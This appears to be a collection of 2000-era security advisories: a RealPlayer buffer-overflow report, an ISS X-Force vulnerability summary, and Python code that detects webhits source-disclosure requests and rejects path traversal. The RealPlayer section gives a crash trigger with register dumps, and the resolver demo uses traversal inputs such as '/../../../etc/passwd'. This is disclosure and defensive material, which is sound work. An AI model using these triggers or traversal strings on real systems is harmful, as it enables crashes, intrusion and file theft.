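    if not entry["stem"].lower().endswith(".htw"):
        return None
    # parse_qs percent-decodes values, so %20 and '+' both become a real space
    params = {k.lower(): v
              for k, v in parse_qs(entry["query"], keep_blank_values=True).items()}
    for target in params.get("ciwebhitsfile", []):
        if target != target.rstrip():
            return "alert"
        if target.lower().endswith(SOURCE_EXTENSIONS):
            return "review"
    return None


def scan_log(lines):
    """Run classify() over log lines; return (ip, stem, verdict) for each hit."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        verdict = classify(entry)
        if verdict:
            hits.append((entry["ip"], entry["stem"], verdict))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```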
More details about CIS can be found on our web site:
http://www.cerberus-infosec.com

Vendor Status
*************

Microsoft were alerted to this issue on the 23rd of February and have updated
an earlier patch, information about which can be found at
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp

About Cerberus Information Security, Ltd
********************************

Cerberus Information Security, Ltd, a UK company, are specialists in
penetration testing and other security auditing services. They are the
developers of CIS (Cerberus' Internet security scanner) available for free
from their website: http://www.cerberus-infosec.com

To ensure that the Cerberus Security Team remains one of the strongest
security audit teams available globally they continually research operating
system and popular service software vulnerabilities leading to the discovery
of "world first" issues. This not only keeps the team sharp but also helps
the industry and vendors as a whole ultimately protecting the end consumer.

As testimony to their ability and expertise one just has to look at exactly
how many major vulnerabilities have been discovered by the Cerberus Security
Team - over 50 to date, making them a clear leader of companies offering such
security services.

Founded in late 1999, by Mark and David Litchfield, Cerberus Information
Security, Ltd are located in London, UK but serves customers across the
World. For more information about Cerberus Information Security, Ltd please
visit their website or call on +44(0) 181 661 7405

Permission is hereby granted to copy or redistribute this advisory but only
in its entirety.

Copyright (C) 2000 by Cerberus Information Security, Ltd

@HWA

253.0 PSS:Win32 Realplayer 6/7 Buffer Overflow
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Win32 Realplayer 6/7 Buffer Overflow Vulnerability

Summary:
----------------------

There is a buffer overflow in the Win32 RealPlayer Basic client, versions 6
and 7.
This appears to occur when >299 characters are entered as a 'location' to
play, such as http://aaaaa..... with 300 a's. I have tested the MacOS and
Linux Realplayer clients and have as yet not found such a vulnerability.

Using the HTML "EMBED" tag to embed RealPlayer in a webpage and setting the
"AUTOSTART=true" flag, you can force RealPlayer to start automatically,
triggering the overflow condition. While I have not taken the time to find
the proper entrance point in PNEN3260.DLL (which is what crashes, for
example, in RealPlay 6 Basic), it appears that arbitrary code could be
exploited simply by *VISITING* a webpage with the malicious embedded
RealPlayer tags.

(the following example is using RealPlayer v.6 Basic)

In full effect, yo:
-------------------

For example: RealPlayer Win32 Version 6.0.7.380

Type into "Location"
http://aaaaaaaaaaa..... (300 a's)

"This program has performed an illegal operation and will be shut down."

REALPLAY caused an invalid page fault in module PNEN3260.DLL at 015f:6216d7ca.
Registers:
EAX=61616161 CS=015f EIP=6216d7ca EFLGS=00010202
EBX=007c0158 SS=0167 ESP=00c6fe70 EBP=00c6fe88
ECX=007c0350 DS=0167 ESI=007c0350 FS=629f
EDX=00000001 ES=0167 EDI=007c0350 GS=0000
Bytes at CS:EIP:
ff 10 33 d2 f7 77 08 8b 47 04 8b 34 90 85 f6 8d
Stack dump:
007c0100 61616161 007c0350 007c0158 007c04d0 78009494 00c6fe9c 6216d853
007c0100 007c0100 007c0100 00c6feac 6218407b 007c0100 007c0100 00c6fed4

Fun. It looks like RealPlayer can be made to execute arbitrary code.

It gets worse, using the HTML EMBED tag for RealPlayer you can force a web
browser (MSIE in this case) to crash as well. This is left as an exercise for
the reader....

Once you embed the RealPlayer in an html page, when Real crashes, it takes
Internet Explorer with it...

"This program has performed an illegal operation and will be shut down"

IEXPLORE caused an invalid page fault in module KERNEL32.DLL at 015f:bff7a379.
Registers:
EAX=61616161 CS=015f EIP=bff7a379 EFLGS=00010216
EBX=084e5054 SS=0167 ESP=0058d840 EBP=0058d864
ECX=61616161 DS=0167 ESI=000003b4 FS=5ac7
EDX=084d0000 ES=0167 EDI=01615dac GS=0000
Bytes at CS:EIP:
89 41 08 8b 53 04 8b 43 08 89 50 04 8d 04 33 50
Stack dump:
01615dac 00000000 084d000c 084d0000 084e5054 00000000 00000000 00009afb
000084e6 0058d88c bff7a541 084d0000 084e5054 000003b4 00000000 00000001

and the extra bonus of:

"This program has performed an illegal operation and will be shut down"

IEXPLORE caused an invalid page fault in module PNEN3260.DLL at 015f:621874ba.
Registers:
EAX=8004004e CS=015f EIP=621874ba EFLGS=00010202
EBX=000000c8 SS=0167 ESP=067dfecc EBP=067dfed4
ECX=08616860 DS=0167 ESI=086163e0 FS=3937
EDX=61616161 ES=0167 EDI=8004004e GS=0000
Bytes at CS:EIP:
ff 52 08 8b c7 5f 5e 5d c2 10 00 90 90 90 90 90
Stack dump:
08616b90 085e69f0 067dfeec 6218893b 085034ec 00400050 00400000 00400000
067dff04 621838b4 08616b90 04606568 0000023c 086163e0 067dff38 62183a47

load the malicious page enough times and you get a fun dialog box that just
won't go away... unless you reboot.

"This program has performed an illegal operation and will be shut down"

IEXPLORE caused an invalid page fault in module KERNEL32.DLL at 015f:bff87eb5.
Registers:
EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010206
EBX=0288fb1c SS=0167 ESP=0284fff0 EBP=0285005c
ECX=00000000 DS=0167 ESI=83b934e0 FS=2c0f
EDX=83b934e8 ES=0167 EDI=00c1e79c GS=0000
Bytes at CS:EIP:
53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
Stack dump:
etc etc etc.

Resolution:
-----------
Vendor Notified 3 April 2000, 10:00 AM MST via email.
Vendor patch should be forthcoming...

----------------------------------------------------
- Adam Muntner            \  Save the Whales!       -
- adam@alienzoo.com       \  Collect Valuable       -
- Systems Engineer        \  Prizes!
- http://www.alienzoo.com \                         -
----------------------------------------------------

-----------------------------------------------------
Get free email and alien enlightenment from http://www.alienzoo.com

@HWA

254.0 ISS Security summary data sheet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-----BEGIN PGP SIGNED MESSAGE-----

ISS Security Alert Summary
April 1, 2000
Volume 5 Number 3

X-Force Vulnerability and Threat Database: http://xforce.iss.net/

To receive these Alert Summaries, subscribe to the ISS Alert mailing list.
Send an email to majordomo@iss.net, and within the body of the message type:
'subscribe alert'.

_____

Contents

33 Reported Vulnerabilities

- windmail-pipe-command
- windmail-fileread
- simpleserver-exception-dos
- linux-domain-socket-dos
- linux-gpm-root
- outlook-manipulate-hidden-drives
- vqserver-dir-traverse
- vqserver-passwd-plaintext
- iis-chunked-encoding-dos
- nav-email-gateway-dos
- netscape-server-directory-indexing
- mercur-webview-get-dos
- officescan-admin-pw-plaintext
- officescan-admin-access
- linux-kreatecd-path
- win-dos-devicename-dos
- wmcdplay-bo
- nt-registry-permissions
- staroffice-scheduler-fileread
- staroffice-scheduler-bo
- iis-root-enum
- mssql-query-abuse
- clipart-cil-bo
- oracle-installer
- linux-rpm-query
- thebat-mua-attach
- irix-infosrch-fname
- linux-dosemu-config
- coldfusion-reveal-pathname
- netscape-enterprise-command-bo
- nmh-execute-code
- htdig-remote-read
- ie-html-shortcut

Risk Factor Key

_____

Date Reported: 3/25/00
Vulnerability: windmail-pipe-command
Platforms Affected: WindMail 3.0
Risk Factor: High
Attack Type: Network Based

WindMail is a command-line email messenger for Windows that can create mail
forms for web sites from CGI scripts. By issuing an HTTP command that
includes the pipe character, an attacker could execute arbitrary commands on
the vulnerable system.
Reference:
Bugtraq Mailing List: "Windmail allow web user get any file" at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=20000325224146.6839.qmail@securityfocus.com

_____

Date Reported: 3/25/00
Vulnerability: windmail-fileread
Platforms Affected: WindMail 3.0
Risk Factor: Medium
Attack Type: Network Based

WindMail is a command-line email messenger for Windows that can create mail
forms for web sites from CGI scripts. By sending a specially-formatted URL,
an attacker could retrieve any ASCII file on the vulnerable system.

Reference:
Bugtraq Mailing List: "Windmail allow web user get any file" at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=20000325224146.6839.qmail@securityfocus.com

_____

Date Reported: 3/25/00
Vulnerability: simpleserver-exception-dos
Platforms Affected: SimpleServer WWW 1.03
Risk Factor: Medium
Attack Type: Network/Host Based

AnalogX SimpleServer WWW is a standard web server for Windows. Version 1.03
is vulnerable to a simple denial of service attack. By requesting a URL with
exactly 8 characters following the /cgi-bin/ directory, an attacker can crash
the server, requiring it to be rebooted.

Reference:
Bugtraq Mailing List: "AnalogX SimpleServer 1.03 Remote Crash" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=web-5645555@post2.rnci.com

_____

Date Reported: 3/23/00
Vulnerability: linux-domain-socket-dos
Platforms Affected: RedHat Linux (6.1, 6.2)
Risk Factor: Medium
Attack Type: Network/Host Based

The Linux kernel is vulnerable to a denial of service attack due to improper
handling of Unix domain sockets. The Unix domain sockets ignore limits set in
wmem_max. A local attacker can crash the system by creating successive Unix
domain sockets, requiring the system to be rebooted.
Reference:
Bugtraq Mailing List: "Local Denial-of-Service attack against Linux" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000323175509.A23709@clearway.com

_____

Date Reported: 3/22/00
Vulnerability: linux-gpm-root
Platforms Affected: Linux running Global Purpose Mouse
Risk Factor: Low
Attack Type: Host Based

The General Purpose Mouse (gpm) package is a tool to enable the mouse for
cutting and pasting on consoles, which ships with several Linux
distributions. Due to a design flaw in gpm-root, which causes the setgid
call to fail, a local user with console access can obtain the group id that
is running gpm-root (usually root).

Reference:
Bugtraq Mailing List: "gpm-root" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000322182143.4498.qmail@securityfocus.com

_____

Date Reported: 3/22/00
Vulnerability: outlook-manipulate-hidden-drives
Platforms Affected: Microsoft Outlook 98
Risk Factor: Medium
Attack Type: Host Based

Microsoft Outlook contains a vulnerability that would allow a local user to
view hidden drives. In Windows NT, an administrator can hide specific drives
using systems policies, so that they cannot be accessed using My Computer,
Windows NT Explorer, or the command prompt. However, the Insert File option
in Microsoft Outlook reveals the hidden drives, allowing a user to copy, cut,
paste, or delete files.

Reference:
Bugtraq Mailing List: "Hide Drives does not work with OUTLOOK 98" at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=20000322151011.2581.qmail@securityfocus.com

_____

Date Reported: 3/21/00
Vulnerability: vqserver-dir-traverse
Platforms Affected: vqSoft's vqServer
Risk Factor: Medium
Attack Type: Network/Host Based

The vqServer program by vqSoft is a Java-based personal web server for
cross-platform environments.
Version 1.9.9 of vqServer, and possibly others, contains a vulnerability that would allow a user to traverse directories by appending /........../ to a URL and submitting it to the server. This would allow a remote attacker to access any file on the system.

Reference: Bugtraq Mailing List: "vqserver /........../" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=4.1.20000321084646.0095c7f0@olga.swip.net

_____

Date Reported: 3/21/00
Vulnerability: vqserver-passwd-plaintext
Platforms Affected: vqSoft's vqServer
Risk Factor: High
Attack Type: Network/Host Based

The vqServer program by vqSoft is a Java-based personal web server for cross-platform environments. Version 1.9.9 of vqServer, and possibly others, stores server settings and passwords unencrypted. A remote user could access the password file, via the directory traversal vulnerability in the program, to obtain the administrator password and gain administrative rights to the server.

Reference: Bugtraq Mailing List: "vqserver /........../" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=4.1.20000321084646.0095c7f0@olga.swip.net

_____

Date Reported: 3/20/00
Vulnerability: iis-chunked-encoding-dos
Platforms Affected: Microsoft Internet Information Server 4.0
Risk Factor: Medium
Attack Type: Network/Host Based

Microsoft Internet Information Server (IIS) 4.0 contains a vulnerability in its support for chunked encoding transfers, because it does not limit the size of these transfers. An attacker could consume memory on the server by requesting that a buffer be reserved for an extremely large amount of data, and then keeping the session open without sending the data. It is possible for an attacker to consume enough memory to cause the server to stop functioning properly. The server can be restored by stopping and restarting the IIS service.
Reference: Microsoft Security Bulletin (MS00-018): "Patch Available for 'Chunked Encoding Post' Vulnerability" at:
http://www.microsoft.com/technet/security/bulletin/ms00-018.asp

_____

Date Reported: 3/17/00
Vulnerability: nav-email-gateway-dos
Platforms Affected: Norton AntiVirus for Internet Email Gateways
Risk Factor: Medium
Attack Type: Network/Host Based

Norton AntiVirus for Internet Email Gateways is an SMTP agent that scans email attachments for viruses. It includes a web-based management and administration interface that uses an embedded web server in the product. By sending a long URL to the server, a user can overflow a buffer and crash the program.

Reference: Bugtraq Mailing List: "DoS with NAVIEG" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=s8d1f3e3.036@kib.co.kodiak.ak.us

_____

Date Reported: 3/17/00
Vulnerability: netscape-server-directory-indexing
Platforms Affected: Netscape Enterprise Server (3.0, 3.51, 3.6)
Risk Factor: Medium
Attack Type: Network/Host Based

Netscape Enterprise Server version 3.x contains a feature called Directory Indexing. This feature, which is enabled by default, displays a directory listing when a user includes certain tags in a requested URL. This could allow a remote attacker to gain unauthorized access to documents or retrieve lists of file names (such as CGI scripts).

Reference: Bugtraq Mailing List: "[SAFER 000317.EXP.1.5] Netscape Enterprise Server and '?wp' tags" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D2173D.24E39DD0@relaygroup.com

_____

Date Reported: 3/16/00
Vulnerability: mercur-webview-get-dos
Platforms Affected: Mercur WebView WebMail-Client 1.0
Risk Factor: Medium
Attack Type: Network/Host Based

MERCUR WebView WebMail-Client 1.0 is an add-on to the MERCUR 3.0 mail server that allows users to read email via a web browser. Due to improper bounds checking in the GET command on port 1080, a user can overflow a buffer and cause the WebMail service to crash.
Reference: Underground Security Systems Research: "Local / Remote DoS Attack in MERCUR WebView WebMail-Client 1.0 for Windows 98/NT Vulnerability" at:
http://www.ussrback.com/labs36.html

_____

Date Reported: 3/16/00
Vulnerability: officescan-admin-pw-plaintext
Platforms Affected: Trend Micro OfficeScan Corporate Edition (3.0, 3.11, 3.13, 3.5)
Risk Factor: High
Attack Type: Network/Host Based

Trend Micro OfficeScan 3.51 and below transmits the administrator password over the network in cleartext. OfficeScan is anti-virus software for corporate networks. When configured in the web-based mode on a Windows NT server, an attacker can use a sniffing program to intercept the administrator password.

Reference: Bugtraq Mailing List: "OfficeScan TrendMicro: admin for everybody!" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D0E213.5F0AA04@neurocom.com

_____

Date Reported: 3/16/00
Vulnerability: officescan-admin-access
Platforms Affected: Trend Micro OfficeScan Corporate Edition (3.0, 3.11, 3.13, 3.5)
Risk Factor: High
Attack Type: Network/Host Based

Trend Micro OfficeScan 3.51 and below allows users to perform administrative tasks without authentication. OfficeScan is anti-virus software for corporate networks. When configured in the web-based mode on a Windows NT server, an unauthenticated attacker can use a web browser to access and execute the CGI scripts used for administration of the software across the network.

References:
Bugtraq Mailing List: "OfficeScan TrendMicro: admin for everybody!"
at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D0E213.5F0AA04@neurocom.com
Bugtraq Mailing List: "Trend Micro releases Patch for 'OfficeScan Unauthenticated CGI Usage' vulnerability" at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=D129BBE1730AD2118A0300805FC1C2FE0650E8E6@209-76-212-10.trendmicro.com

_____

Date Reported: 3/16/00
Vulnerability: linux-kreatecd-path
Platforms Affected: SUSE Linux (6.0, 6.1, 6.2, 6.3)
Risk Factor: High
Attack Type: Host Based

The kreatecd package is a graphical front end tool for the cdrecord command that ships with several Linux distributions. The program is installed setuid root and is designed to trust the configuration path to cdrecord. A local attacker could use kreatecd to execute commands as root.

Reference: Bugtraq Mailing List: "TESO & C-Skills development advisory -- kreatecd" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=ine.LNX.3.96.1000316143853.257E-200000@ati12.cs.uni-potsdam.de

_____

Date Reported: 3/16/00
Vulnerability: win-dos-devicename-dos
Platforms Affected: Windows 95
                    Windows 98
Risk Factor: Medium
Attack Type: Network Based

Microsoft Windows 95 and 98 contain a vulnerability in the parsing of file path names. DOS device names, such as COM1 or LPT1, are reserved words and normally cannot be used as file or directory names. If a user attempts to access a file path name that includes one DOS device name, it is treated as invalid, and an error is returned. However, if the path name includes multiple DOS device names, the machine will crash.

Reference: Microsoft Security Bulletin (MS00-017): "Patch Available for 'DOS Device in Path Name' Vulnerability" at:
http://www.microsoft.com/technet/security/bulletin/ms00-017.asp

_____

Date Reported: 3/10/00
Vulnerability: wmcdplay-bo
Platforms Affected: wmcdplay
Risk Factor: High
Attack Type: Host Based

The wmcdplay CD player program is vulnerable to a buffer overflow attack.
A local attacker can pass an argument that overflows the stack, due to insufficient bounds checking on calls to sprintf. The program is setuid root, allowing an attacker to gain root privileges by overflowing the stack and executing arbitrary code on the system.

Reference: BugTraq mailing list: "wmcdplay Buffer Overflow Vulnerability" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000311143230.4C0C01EE8B@lists.securityfocus.com

_____

Date Reported: 3/9/00
Vulnerability: nt-registry-permissions
Platforms Affected: Microsoft Windows NT 4.0
Risk Factor: High
Attack Type: Host Based

Windows NT 4.0, including the Workstation, Server, and Terminal Server versions, has some registry permissions that are too permissive. A local user with access to the machine could potentially increase their access and cause code to be executed on the machine.

Reference: Microsoft Security Bulletin (MS00-008): "Patch Available for 'Registry Permissions' Vulnerability" at:
http://www.microsoft.com/technet/security/bulletin/ms00-008.asp

_____

Date Reported: 3/9/00
Vulnerability: staroffice-scheduler-fileread
Platforms Affected: StarOffice 5.1
Risk Factor: Medium
Attack Type: Network Based

StarOffice is an office-productivity suite from Sun Microsystems. The StarSchedule server, which controls the group scheduling component of StarOffice, allows an attacker to read files on the server. A remote user can traverse directories using "../" paths to read any file on the server through a browser.

Reference: Bugtraq Mailing List: "[SAFER 000309.EXP.1.4] StarScheduler (StarOffice) vulnerabilities" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=38C68FB8.6F234393@relaygroup.com

_____

Date Reported: 3/9/00
Vulnerability: staroffice-scheduler-bo
Platforms Affected: StarOffice 5.1
Risk Factor: High
Attack Type: Network Based

StarOffice is an office-productivity suite from Sun Microsystems.
The StarSchedule server, which controls the group scheduling component of StarOffice, is vulnerable to a buffer overflow attack. Sending a large amount of data to the GET command will crash the server, and could allow an attacker to execute arbitrary code as root.

Reference: Bugtraq Mailing List: "[SAFER 000309.EXP.1.4] StarScheduler (StarOffice) vulnerabilities" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=38C68FB8.6F234393@relaygroup.com

_____

Date Reported: 3/8/00
Vulnerability: iis-root-enum
Platforms Affected: IIS (4.0, 5.0)
Risk Factor: Medium
Attack Type: Host Based

Microsoft Internet Information Server (IIS) 4.0 and 5.0 discloses the paths of network shares if configured incorrectly. Files of type IDQ, IDA, and HTX cannot be served from a network share. If a web site administrator attempts to serve these types of files from network shares, a user who attempts to access them will receive an error message that discloses the share path of the file.

Reference: BugTraq mailing list: "Microsoft IIS UNC Path Disclosure Vulnerability" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=007201bf89dc$a18dd2e0$056fee3f@spis.net

_____

Date Reported: 3/8/00
Vulnerability: mssql-query-abuse
Platforms Affected: Microsoft SQL Server 7.0
                    Microsoft Data Engine 1.0
Risk Factor: High
Attack Type: Network Based

Microsoft SQL Server 7.0 and Microsoft Data Engine 1.0 are vulnerable to a remote query problem. The server and engine do not perform sufficient argument validation on particular types of SQL statements. A remote user who has access to submit queries could take actions on the SQL database and possibly perform actions on the server itself.
Reference: Microsoft Security Bulletin (MS00-014): "Patch Available for 'SQL Query Abuse' Vulnerability" at:
http://www.microsoft.com/technet/security/bulletin/ms00-014.asp

_____

Date Reported: 3/6/00
Vulnerability: clipart-cil-bo
Platforms Affected: Microsoft Office 2000
                    Microsoft Works 2000
Risk Factor: High
Attack Type: Host Based

Microsoft Clip Art Gallery, shipped with such packages as Microsoft Office 2000 and Microsoft Works 2000, contains a possible buffer overflow in the handling of CIL files. The CIL file format is used for downloading additional clips for installation into the gallery. If a CIL file is created with a long field embedded in it, it will overflow the buffer and crash the Clip Gallery, which could result in the execution of arbitrary code.

Reference: Microsoft Security Bulletin (MS00-015): "Patch Available for 'Clip Art Buffer Overrun' Vulnerability" at:
http://www.microsoft.com/technet/security/bulletin/ms00-015.asp

_____

Date Reported: 3/5/00
Vulnerability: oracle-installer
Platforms Affected: Oracle 8.1.5i
Risk Factor: High
Attack Type: Host Based

The installation program for Oracle 8.1.5i contains a vulnerability that could allow an attacker to gain root access. The Oracle installation script creates the directory /tmp/orainstall, owned by oracle:dba, mode 711, containing the shell script orainstRoot.sh, mode 777. Then, the installation program stops and asks the user to run the orainstRoot.sh script. An attacker could create a symbolic link from this file to elsewhere on the file system, which could be used to create an .rhosts file and gain access to the root account. A local user could also edit this script to execute arbitrary commands when run by root.
Reference: BugTraq Mailing List: "Oracle for Linux Installer Vulnerability" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.BSO.4.10.10003051801030.22289-100000@obscurity.org

_____

Date Reported: 3/3/00
Vulnerability: linux-rpm-query
Platforms Affected: Caldera OpenLinux 2.3
Risk Factor: Medium
Attack Type: Network Based

Caldera OpenLinux 2.3 contains a vulnerability in the rpm_query CGI. The rpm_query CGI is installed in the /home/httpd/cgi-bin/ directory. A remote user could run this CGI to obtain a listing of the name and version number of every package installed on the system.

Reference: BugTraq mailing list: "Caldera OpenLinux 2.3 rpm_query CGI Vulnerability" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.21.0003041204220.6797-100000@juggernaut.el8.org

_____

Date Reported: 3/2/00
Vulnerability: thebat-mua-attach
Platforms Affected: The Bat!
Risk Factor: Medium
Attack Type: Network Based

The Bat! is a mail agent for Windows developed by Rit Research Labs. One of the program's features is that it saves attachments from incoming mail in a specified folder on the system, and adds the file's path to the incoming message as a pseudo-header called X-BAT-FILES. If a message with an attachment is forwarded to someone else, the pseudo-header line remains. This allows the recipient to see the sender's default location for all saved email attachments.

Reference: BugTraq Mailing List: "Rit Research Labs 'The Bat!' X-BAT-FILES Vulnerabilities" at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=200003021443.RAA31070@adm.sci-nnov.ru

_____

Date Reported: 3/2/00
Vulnerability: irix-infosrch-fname
Platforms Affected: IRIX 6.5
Risk Factor: High
Attack Type: Network/Host Based

InfoSearch is a tool distributed by SGI that converts man pages, release notes, and other documents into HTML format for reading on the Internet.
It contains a vulnerability in the method it uses to parse input for the fname variable that would allow a remote attacker to execute arbitrary commands on the web server.

Reference: Bugtraq Mailing List: "infosrch.cgi vulnerability (IRIX 6.5)" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.10.10003021059360.21162-100000@inetarena.com

_____

Date Reported: 3/2/00
Vulnerability: linux-dosemu-config
Platforms Affected: Corel Linux 1.0
Risk Factor: High
Attack Type: Host Based

Corel Linux 1.0 contains a vulnerability in the configuration of the dosemu package. Dosemu is a DOS emulator that allows DOS programs to run on Linux. A local user can use the system.com binary to execute commands as root.

Reference: Bugtraq Mailing List: "Corel Linux 1.0 dosemu default configuration: Local root vuln" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200003020436.PAA20168@jawa.chilli.net.au

_____

Date Reported: 3-01-2000
Vulnerability: coldfusion-reveal-pathname
Platforms Affected: ColdFusion 4.01
Risk Factor: Low
Attack Type: Network Based

ColdFusion 4.01 contains a vulnerability that can reveal path names to cfm pages. When a remote user makes an HTTP request to a cfm page, the server will return an error message that reveals the full path name to the file.

Reference: NTBUGTRAQ Mailing List: "ColdFusions application.cfm shows full path" at:
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0003&L=ntbugtraq&F=&S=&P=435

_____

Date Reported: 3-01-2000
Vulnerability: netscape-enterprise-command-bo
Platforms Affected: Netscape Enterprise Server (3.6)
Risk Factor: High
Attack Type: Network Based

Netscape Enterprise Server 3.6 web server for Windows NT 4.0 contains a buffer overflow in commands issued to the server. If a remote user issues a command followed by a large quantity of data, the server will crash. It is possible for the user to then execute arbitrary code.

References:
S.A.F.E.R.
Security Bulletin SAFER 000229.EXP.1.3: "Buffer Overflow in Netscape Enterprise Server" at:
http://www.safermag.com/advisories/0006.html
BUGTRAQ Mailing List: "[SAFER 000229.EXP.1.3] Remote buffer overflow in Netscape Enterprise Server 3.6 SP2" at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-02-29&msg=38BC065A.E6AE7002@relaygroup.com

_____

Date Reported: 3/1/00
Vulnerability: nmh-execute-code
Platforms Affected: Debian Linux 2.1
Risk Factor: High
Attack Type: Network Based

The nmh package does not properly check incoming mail message headers. A remote attacker could send specially-crafted MIME message headers that would cause mhshow to execute arbitrary code.

Reference: Debian Security Advisory: "New version of nmh released" at:
http://www.debian.org/Lists-Archives/debian-security-announce-00/msg00005.html

_____

Date Reported: 3/1/00
Vulnerability: htdig-remote-read
Platforms Affected: Unix running htdig 3.1.5
Risk Factor: Low
Attack Type: Network Based

The ht://dig program is a web indexing and searching system for intranets and small domains. Due to improper validation of form input, a remote attacker could pass a variable to the htsearch CGI that would allow the attacker to read any file on the machine that is accessible to the htdig user.

Reference: Debian Security Advisory: "New version of htdig released" at:
http://www.debian.org/Lists-Archives/debian-security-announce-00/msg00004.html

_____

Date Reported: 3/1/00
Vulnerability: ie-html-shortcut
Platforms Affected: Microsoft Internet Explorer (5.0, 5.0.1)
Risk Factor: High
Attack Type: Network/Host Based

Microsoft Internet Explorer 5 uses window.showHelp() to open HTML help files (.chm). If these files contain a shortcut to an executable, it will be run with the privileges of the current user. An attacker could create a .chm file with a link to an executable and cause it to execute on the victim's machine.
Reference: Bugtraq Mailing List: "IE 5.x allows executing arbitrary programs using .chm files" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=38BD37F6.C9B3F8B@nat.bg

_____

Risk Factor Key:

High    Any vulnerability that provides an attacker with immediate access into a machine, gains superuser access, or bypasses a firewall.
        Example: A vulnerable Sendmail 8.6.5 version that allows an intruder to execute commands on the mail server.

Medium  Any vulnerability that provides information that has a high potential of giving system access to an intruder.
        Example: A misconfigured TFTP or vulnerable NIS server that allows an intruder to get the password file that could contain an account with a guessable password.

Low     Any vulnerability that provides information that potentially could lead to a compromise.
        Example: A finger that allows an intruder to find out who is online and potential accounts to attempt to crack passwords via brute force methods.

_____

Permission is hereby granted for the redistribution of this Alert Summary electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert Summary in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission.

Disclaimer

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

X-Force PGP Key available at: http://xforce.iss.net/sensitive.php3 as well as on MIT's PGP key server and PGP.com's key server.

Please send suggestions, updates, and comments to: X-Force of Internet Security Systems, Inc.
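Several of the entries above share one root cause. windmail-fileread, vqserver-dir-traverse, staroffice-scheduler-fileread and htdig-remote-read are all a server mapping a request path onto the filesystem without confining the result to its document root (the vqServer report shows the unusual /........../ form, StarSchedule the classic "../"), and win-dos-devicename-dos is a path being opened without checking its components for reserved DOS device names. The Python below is an added example written for this summary; it is not code from X-Force or from any of the products named. It shows the two checks a server-side path resolver should make before touching the filesystem. The document root, the sample requests and the rule rejecting all-dot segments are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed document root for the example; only its prefix matters.
DOC_ROOT = "/srv/www/htdocs"

# Reserved DOS device names on Windows 9x/NT: CON, PRN, AUX, NUL, COM1-COM9,
# LPT1-LPT9. Matched case-insensitively and with any extension, because
# "COM1.txt" still names the COM1 device.
_DEVICE_RE = re.compile(
    r"^(CON|PRN|AUX|NUL|COM[1-9]|LPT[1-9])(\.[^.]*)?$", re.IGNORECASE)


def _segments(url_path):
    """Percent-decode once and split on both slash styles."""
    return unquote(url_path).replace("\\", "/").split("/")


def device_name_components(url_path):
    """Return every path component that is a reserved DOS device name.

    MS00-017 describes one device name in a path as a harmless error and
    two or more as a crash; a server on Windows 9x should refuse both, so
    the caller only needs to know whether this list is empty.
    """
    return [seg for seg in _segments(url_path) if _DEVICE_RE.match(seg)]


def resolve_request_path(url_path, doc_root=DOC_ROOT):
    """Map a URL path onto doc_root, or return None if it must not be served.

    Rejects: reserved device names anywhere in the path; segments made only
    of three or more dots (the "/........../" form is never a real file name,
    and the vqServer report shows a server treating it like ".."); and any
    path that, after normalisation, lies outside doc_root ("../" escapes).
    """
    doc_root = posixpath.normpath(doc_root)
    segments = _segments(url_path)
    if any(_DEVICE_RE.match(seg) for seg in segments):
        return None
    if any(len(seg) >= 3 and set(seg) == {"."} for seg in segments):
        return None
    # Join the decoded path under doc_root, then collapse ".", ".." and
    # duplicate slashes. Enough ".." segments normalise to a location
    # outside doc_root, which the prefix check catches.
    joined = posixpath.join(doc_root, "/".join(segments).lstrip("/"))
    full = posixpath.normpath(joined)
    if full != doc_root and not full.startswith(doc_root + "/"):
        return None
    return full


if __name__ == "__main__":
    # Constructed requests, not taken from any of the reports above.
    for req in ["/index.html", "/docs/../index.html", "/../../../etc/passwd",
                "/..%2F..%2Fetc/passwd", "/........../etc/passwd", "/aux/con"]:
        print("%-28s -> %s" % (req, resolve_request_path(req)))
```

The decode happens exactly once; a server that percent-decodes twice (or lets a downstream CGI decode again) must run the same checks on the final form, since "%252e%252e" only becomes ".." after the second pass. The prefix comparison is done on the normalised string rather than on the segments, so it stays correct when doc_root itself contains ".." or trailing slashes.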
